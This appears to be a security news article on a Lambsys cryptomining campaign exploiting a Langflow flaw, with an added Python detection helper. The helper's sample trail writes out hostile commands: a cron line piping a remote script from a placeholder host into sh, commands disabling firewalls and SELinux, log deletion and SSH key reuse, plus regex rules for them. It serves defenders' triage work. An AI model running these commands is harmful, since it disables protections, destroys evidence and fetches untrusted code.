Threat actors are actively exploiting CVE-2026-33017, a critical unauthenticated remote code execution vulnerability in Langflow (CVSS 9.3), to deploy a Monero cryptocurrency miner on internet-exposed AI application endpoints. The campaign, observed between March 27 and April 15, 2026, scans for reachable Langflow instances and uses them as an initial foothold into enterprise networks.
According to Trend Micro researchers, the attack consists of a single line of Python code evaluated by an unauthenticated Langflow API endpoint; that line pulls down a shell script, which fetches the miner binary and launches it as a detached process. The malware, named Lambsys, terminates competing miner processes (Kinsing, WatchDog, Rocke, Outlaw), deletes rival wallet and key material, disables host security controls (AppArmor, UFW, iptables, SELinux, the kernel NMI watchdog, and the Aliyun agent), establishes cron-based persistence, and beacons to an external server. It also spreads to other hosts using SSH keys already present on the compromised machine, turning an exposed Langflow instance into a pathway for broader compromise.
The Lambsys binary, an ELF executable written in Go, forks cascading shell subprocesses for reliability, removes system logs, and manipulates immutable file attributes. It queries ipinfo.io for geolocation, which it uses to pick a mining pool and to geo-fence its activity. Trend Micro notes that an artifact dating from May 2024 indicates the threat actor has been iterating on this malware for nearly two years. The campaign highlights how exposed AI application endpoints are becoming a new vector for cryptojacking. Defenders should treat any Langflow instance reachable without authentication as exposed to this chain, and should triage such hosts for the artifacts described here: new cron entries, disabled AppArmor, SELinux or firewall state, immutable-attribute changes on system files, killed or missing security agents, and unexpected outbound connections to ipinfo.io.
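The following is an added example, not code from the Trend Micro report or from the article: a small Python triage helper that turns the behaviours described above (killing rival miners, disabling host controls, immutable-attribute tampering, cron persistence, detached launch, log wiping, the ipinfo.io lookup and SSH key reuse) into regex rules and runs them over a constructed trail of command lines, such as a recovered shell history or an auditd execve record. The sample commands, the 10.0.0.12 host, the example.invalid URL, the /tmp/.x path and the Aliyun process-name pattern are all assumptions made for the example; the article names none of them.

```python
import re
from collections import Counter

# Constructed sample of command lines, as one might recover from shell
# history or an auditd execve trail. These are illustrative and NOT real
# Lambsys artifacts; the host, URL and paths are placeholders.
SAMPLE_COMMANDS = [
    "systemctl stop apparmor",
    "ufw disable",
    "iptables -F",
    "setenforce 0",
    "sysctl -w kernel.nmi_watchdog=0",
    "pkill -f kinsing",
    "chattr -ia /etc/crontab",
    "curl -s https://ipinfo.io/json",
    "(crontab -l; echo '* * * * * curl -fsSL http://example.invalid/x.sh | sh') | crontab -",
    "nohup /tmp/.x/miner >/dev/null 2>&1 &",
    "rm -rf /var/log/wtmp /var/log/btmp",
    "ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa root@10.0.0.12",
    "ls -la /opt/langflow",   # benign admin activity
    "apt-get update",         # benign admin activity
]

# One rule per behaviour the write-up attributes to Lambsys. The Aliyun
# pattern is an assumption: the article only says "Aliyun agent".
RULES = {
    "disable_host_controls": re.compile(
        r"systemctl\s+(stop|disable)\s+apparmor|service\s+apparmor\s+stop"
        r"|\bufw\s+disable\b|\biptables\s+-[FX]\b|\bsetenforce\s+0\b"
        r"|nmi_watchdog=0|[Aa]li[Yy]un"
    ),
    "kill_rival_miner": re.compile(
        r"\b(pkill|killall|kill)\b.*\b(kinsing|watchdog|xmrig|minerd)\b", re.I
    ),
    "immutable_attr_tamper": re.compile(r"\bchattr\s+[-+]\w*i\w*\b"),
    "geolocation_lookup": re.compile(r"\bipinfo\.io\b"),
    "cron_persistence": re.compile(r"\bcrontab\s+-|/etc/cron|/var/spool/cron"),
    "detached_launch": re.compile(r"\b(nohup|setsid|disown)\b|&\s*$"),
    "log_wiping": re.compile(r"\brm\s+(-\S+\s+)*(/var/log|/root/\.bash_history)"),
    "download_and_exec": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "ssh_key_reuse": re.compile(r"\bssh\b.*(-i\s+\S*id_\w+|StrictHostKeyChecking=no)"),
}


def classify(command):
    """Return the names of every rule a single command line triggers."""
    return [name for name, rx in RULES.items() if rx.search(command)]


def scan(commands):
    """Return (rule, command) pairs for every hit across a command trail."""
    return [(name, cmd) for cmd in commands for name in classify(cmd)]


def assess(commands, min_categories=3):
    """Count distinct behaviour categories in a trail.

    A single hit (an admin running 'ufw disable') is noise. Several
    categories together is the kill-rivals / disable-controls / persist /
    beacon pattern the report describes, so the verdict is based on
    breadth across categories rather than on any one rule firing.
    """
    categories = Counter(name for name, _ in scan(commands))
    return categories, len(categories) >= min_categories


if __name__ == "__main__":
    cats, suspicious = assess(SAMPLE_COMMANDS)
    for name, count in sorted(cats.items()):
        print(f"{name:24s} {count}")
    print("suspicious:", suspicious)
```

On the constructed trail every category fires at least once and the host is flagged; the two benign lines trigger nothing. Deliberately, no single rule is treated as conclusive, since each command has a legitimate use on its own; it is the combination, in one session, that matches the described dropper.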
CVEs: CVE-2026-33017, CVE-2025-3248, CVE-2026-20245
Attack groups: Kinsing, WatchDog, Rocke, Outlaw
Malware: Lambsys, XMRig, Flodrix
Companies: Trend Micro, Alibaba Cloud
Products: Langflow
Original source: thehackernews.com